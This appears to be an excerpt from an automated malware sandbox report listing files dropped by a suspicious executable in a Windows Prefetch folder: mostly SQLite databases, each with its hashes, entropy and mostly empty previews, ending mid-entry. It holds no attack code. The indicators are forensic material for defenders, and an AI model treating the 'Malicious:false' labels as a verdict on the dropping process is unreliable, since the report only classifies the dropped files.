                                                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5707520969659783
                                                            Encrypted:false
                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.8439810553697228
                                                            Encrypted:false
                                                            SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                            MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                            SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                            SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                            SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):25
                                                            Entropy (8bit):4.213660689688185
                                                            Encrypted:false
                                                            SSDEEP:3:+NFn/5n:+NF/5
                                                            MD5:FA322498694C055C413E794D968753F0
                                                            SHA1:A002C11EE95BDF94506FFD4CDA443C3E78E65B27
                                                            SHA-256:16E9DE9BB2F3D9BB026672589BBE99F0746BF144351729D7C1BAEEAC11C943DB
                                                            SHA-512:9DD8E03EE1B3A140C6CF2DAD18336AD34C877F400D05F64ABD3788D361D992D82651727D545BF35815EC7D03A36A142A1A97810BEE93DA78174CC71E1E7BBAE7
                                                            Malicious:false
                                                            Preview:eKMwCKYlklxaYQNtBZgS8wKhT
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):51200
                                                            Entropy (8bit):0.8746135976761988
                                                            Encrypted:false
                                                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5712781801655107
                                                            Encrypted:false
                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5707520969659783
                                                            Encrypted:false
                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.8439810553697228
                                                            Encrypted:false
                                                            SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                            MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                            SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                            SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                            SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.8439810553697228
                                                            Encrypted:false
                                                            SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                            MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                            SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                            SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                            SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.8439810553697228
                                                            Encrypted:false
                                                            SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                            MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                            SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                            SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                            SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5707520969659783
                                                            Encrypted:false
                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5712781801655107
                                                            Encrypted:false
                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):51200
                                                            Entropy (8bit):0.8746135976761988
                                                            Encrypted:false
                                                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5707520969659783
                                                            Encrypted:false
                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.8439810553697228
                                                            Encrypted:false
                                                            SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                            MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                            SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                            SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                            SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):51200
                                                            Entropy (8bit):0.8746135976761988
                                                            Encrypted:false
                                                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.6732424250451717
                                                            Encrypted:false
                                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
